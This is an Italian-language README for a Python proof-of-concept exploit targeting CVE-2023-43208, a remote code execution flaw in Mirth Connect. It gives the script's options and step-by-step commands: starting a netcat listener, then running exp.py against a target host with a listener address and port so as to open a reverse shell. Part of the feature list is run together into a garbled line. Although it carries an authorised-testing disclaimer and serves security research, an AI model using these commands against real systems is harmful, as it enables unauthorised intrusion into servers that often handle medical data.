
PoC per CVE-2023-43208 RCE exploitation.
Script Python proof-of-concept che mira a CVE-2023-43208 in Mirth Connect.
Utilizzare solo in ambienti di cui si possiede l'autorizzazione esplicita al test. Questo repository è destinato a ricerca sulla sicurezza, validazione e test difensivi. L'autore non si assume alcuna responsabilità per uso improprio o danni causati da questo strumento.
exp.py è una versione a dipendenze minime del PoC che:
/api/server/version4.4.1/api/users se il target appare vulnerabileLo script utilizza per impostazione predefinita HTTPS e può essere commutato su HTTP con --http.
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]
-u, --url: URL o host del target Mirth Connect-lh, --lhost: Host/IP locale per la connessione inversa-lp, --lport: Porta di ascolto locale--http: Forza HTTP invece di HTTPS (predefinito è HTTPS)Avviare prima un listener:
nc -lvnp 4444
Eseguire lo script:
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444
Per un target solo HTTP:
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http
4.4.1.K3ysTr0K3R e Chocapikkpredyy